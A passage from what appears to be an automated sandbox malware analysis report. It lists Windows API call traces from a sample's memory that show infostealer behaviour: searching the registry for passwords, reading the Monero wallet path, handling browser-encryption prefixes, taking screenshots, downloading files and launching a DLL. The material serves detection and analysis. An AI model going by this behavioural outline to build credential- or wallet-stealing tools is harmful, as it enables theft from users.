                                                              • lstrcat.KERNEL32(?,00000000), ref: 0248EC33
                                                              • lstrcat.KERNEL32(?,00435504), ref: 0248EC4A
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0248ECB8
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248ECE9
                                                              • lstrcat.KERNEL32(?,00000000), ref: 0248ECF5
                                                              • lstrcat.KERNEL32(?,00435518), ref: 0248ED0C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$FolderPathlstrcpy
                                                              • String ID:
                                                              • API String ID: 818526691-0
                                                              • Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                              • Instruction ID: b9555b260363e2d8cd4cc5c8f84c3a01304baef9854e28559ff42cfce4c73599
                                                              • Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                              • Instruction Fuzzy Hash: 6761C271604354ABD324FF70DC45FDE7BE5AF88700F10881EBA9997191DBB4D6088BA6
                                                              APIs
                                                              • strtok_s.MSVCRT ref: 00418263
                                                              • lstrlenA.KERNEL32(00000000), ref: 0041829C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
                                                              • lstrlenA.KERNEL32(00000000), ref: 004182F0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
                                                              • lstrlenA.KERNEL32(00000000), ref: 00418344
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
                                                              • lstrlenA.KERNEL32(00000000), ref: 00418398
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
                                                              • lstrlenA.KERNEL32(00000000), ref: 004183E1
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
                                                              • strtok_s.MSVCRT ref: 0041842A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpylstrlen$strtok_s
                                                              • String ID:
                                                              • API String ID: 2211830134-0
                                                              • Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                              • Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
                                                              • Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                              • Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 024944CB
                                                              • GetDesktopWindow.USER32 ref: 024944D5
                                                              • GetWindowRect.USER32(00000000,?), ref: 024944E3
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0249451A
                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 0249459C
                                                              • GlobalLock.KERNEL32(?), ref: 024945A7
                                                              • GlobalSize.KERNEL32(?), ref: 024945B6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                                              • String ID:
                                                              • API String ID: 1264946473-0
                                                              • Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                              • Instruction ID: a5939312335d6e71548687aa3b7ba579b0acdac450f37c2ef2d64b4cdb6af024
                                                              • Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                              • Instruction Fuzzy Hash: 035109B1114340AFD710EF65DC88EAABBEAEB88714F00491EF99583250DB74E905CFA2
                                                              APIs
                                                              • lstrcat.KERNEL32(?,00638B0C), ref: 0248E394
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0248E3BE
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248E3F6
                                                              • lstrcat.KERNEL32(?,00000000), ref: 0248E404
                                                              • lstrcat.KERNEL32(?,?), ref: 0248E41F
                                                              • lstrcat.KERNEL32(?,?), ref: 0248E433
                                                              • lstrcat.KERNEL32(?,00638A84), ref: 0248E447
                                                              • lstrcat.KERNEL32(?,?), ref: 0248E45B
                                                              • lstrcat.KERNEL32(?,00638AC8), ref: 0248E46E
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248E4A6
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0248E4AD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                                              • String ID:
                                                              • API String ID: 4230089145-0
                                                              • Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
                                                              • Instruction ID: b6a50315060e315abbca6a45d727225d36abe2c5acb913e714c53a9d3da09bd8
                                                              • Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
                                                              • Instruction Fuzzy Hash: 986151B591012CEBCB14EF74CD44ADD77B6AF88300F1049AAE959A3250DBB4AF85DF90
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
                                                              • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
                                                              • StrCmpCA.SHLWAPI(?,00A0FE90), ref: 00406A8A
                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
                                                              • CloseHandle.KERNEL32(00000000), ref: 00406B50
                                                              • InternetCloseHandle.WININET(00000000), ref: 00406B57
                                                              • InternetCloseHandle.WININET(?), ref: 00406B61
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                              • String ID:
                                                              • API String ID: 2500263513-0
                                                              • Opcode ID: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
                                                              • Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
                                                              • Opcode Fuzzy Hash: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
                                                              • Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02476CA6
                                                              • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02476CD3
                                                              • StrCmpCA.SHLWAPI(?,00638C80), ref: 02476CF1
                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 02476D11
                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02476D2F
                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02476D48
                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02476D6D
                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02476D97
                                                              • CloseHandle.KERNEL32(00000000), ref: 02476DB7
                                                              • InternetCloseHandle.WININET(00000000), ref: 02476DBE
                                                              • InternetCloseHandle.WININET(?), ref: 02476DC8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                              • String ID:
                                                              • API String ID: 2500263513-0
                                                              • Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                              • Instruction ID: 79f049548168fa0aa0553962d3a975cf37eb030951716a4350003bf01345ded3
                                                              • Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                              • Instruction Fuzzy Hash: 41418CB1A10615AFDB20DF65DC45FEE77BAAB44704F004459FA14E7280DF70AA408BA4
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(0043573C,?,024879A8), ref: 02494A6D
                                                              • GetProcAddress.KERNEL32(00000000,00435748), ref: 02494A83
                                                              • GetProcAddress.KERNEL32(00000000,00435750), ref: 02494A94
                                                              • GetProcAddress.KERNEL32(00000000,0043575C), ref: 02494AA5
                                                              • GetProcAddress.KERNEL32(00000000,00435768), ref: 02494AB6
                                                              • GetProcAddress.KERNEL32(00000000,00435770), ref: 02494AC7
                                                              • GetProcAddress.KERNEL32(00000000,0043577C), ref: 02494AD8
                                                              • GetProcAddress.KERNEL32(00000000,00435784), ref: 02494AE9
                                                              • GetProcAddress.KERNEL32(00000000,0043578C), ref: 02494AFA
                                                              • GetProcAddress.KERNEL32(00000000,0043579C), ref: 02494B0B
                                                              • GetProcAddress.KERNEL32(00000000,004357A8), ref: 02494B1C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 2238633743-0
                                                              • Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                              • Instruction ID: dfbad0a71744f6d0907d508bd128d8e71d5591818f5b4c8ef24ec0200a62f86b
                                                              • Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                              • Instruction Fuzzy Hash: 4C117876951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4
                                                              APIs
                                                              • strtok_s.MSVCRT ref: 00418105
                                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
                                                              • StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
                                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
                                                              • strtok_s.MSVCRT ref: 0041820F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpylstrlenstrtok_s
                                                              • String ID: ;B$fplugins
                                                              • API String ID: 3280532728-1193078497
                                                              • Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                              • Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
                                                              • Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                              • Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94
                                                              APIs
                                                                • Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                                • Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                                • Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
                                                                • Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                                • Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
                                                                • Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                                • Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
                                                                • Part of subcall function 00407710: strlen.MSVCRT ref: 00407840
                                                              • lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
                                                              • lstrcatA.KERNEL32(00000000,?), ref: 004079FD
                                                              • lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
                                                              • lstrcatA.KERNEL32(00000000,?), ref: 00407A30
                                                              • wsprintfA.USER32 ref: 00407A50
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00407A79
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
                                                              • lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                              • String ID: :
                                                              • API String ID: 2460923012-3653984579
                                                              • Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                              • Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
                                                              • Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
                                                              • Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247BF76
                                                              • lstrlen.KERNEL32(00000000), ref: 0247BFA9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247BFD3
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0247BFDB
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247C003
                                                              • lstrlen.KERNEL32(0043509C), ref: 0247C07A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 2500673778-0
                                                              • Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
                                                              • Instruction ID: 8023a5fd3aea74d9755ab5bb9d6331894cdcb9dd438b7636fdc761d49496f8ad
                                                              • Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
                                                              • Instruction Fuzzy Hash: AEA15B70A01245CFCB24DF69C988AEEB7F6AF44309F14846BE8299B361DB75D841CF90
                                                              APIs
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
                                                                • Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248C8F2
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248C91B
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0248C97B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                              • String ID: (QC$.dll$<$XTC$\TC
                                                              • API String ID: 3031569214-1251744519
                                                              • Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
                                                              • Instruction ID: 8ff5f6c7fe52e62ba0ea06d8421d5a3de3b01de6636d31526803c7bc32a1a0b2
                                                              • Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
                                                              • Instruction Fuzzy Hash: 92515B719202998BCB54FF79C88098DBBB2AF44319F1548BED859AB610DB34DD46CF40
                                                              APIs
                                                              • memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
                                                              • memset.MSVCRT ref: 00409ECF
                                                              • LocalAlloc.KERNEL32(00000040), ref: 00409F07
                                                                • Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E
                                                              • lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpymemcmp$AllocLocalmemset
                                                              • String ID: @$v10$v20
                                                              • API String ID: 3420379846-278772428
                                                              • Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                              • Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
                                                              • Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                              • Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248E3F6
                                                              • lstrcat.KERNEL32(?,00000000), ref: 0248E404
                                                              • lstrcat.KERNEL32(?,?), ref: 0248E41F
                                                              • lstrcat.KERNEL32(?,?), ref: 0248E433
                                                              • lstrcat.KERNEL32(?,00638A84), ref: 0248E447
                                                              • lstrcat.KERNEL32(?,?), ref: 0248E45B
                                                              • lstrcat.KERNEL32(?,00638AC8), ref: 0248E46E
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248E4A6
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0248E4AD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$lstrcpy$AttributesFile
                                                              • String ID:
                                                              • API String ID: 3428472996-0
                                                              • Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
                                                              • Instruction ID: 6415f750d726db7696c73129a51235720f318165935faaf3ebc9bbb504bb136f
                                                              • Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
                                                              • Instruction Fuzzy Hash: 67418EB1910128DBCB24EF74CC48ADE77B6AF48300F1089AAF95993250DBB49F85DF90
                                                              APIs
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
                                                                • Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248C736
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248C75F
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0248C7CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                              • String ID: "" $(QC$(QC$<
                                                              • API String ID: 3031569214-2404812987
                                                              • Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                              • Instruction ID: 6daf941faea9c6402fbd7ff47f5d05d63418979eff495cac44e81bbc9fd1f200
                                                              • Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                              • Instruction Fuzzy Hash: B7512A729202998BCB14FF79D88099DBBB2AF84318F25487FD815AB611DB349D46CF90
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
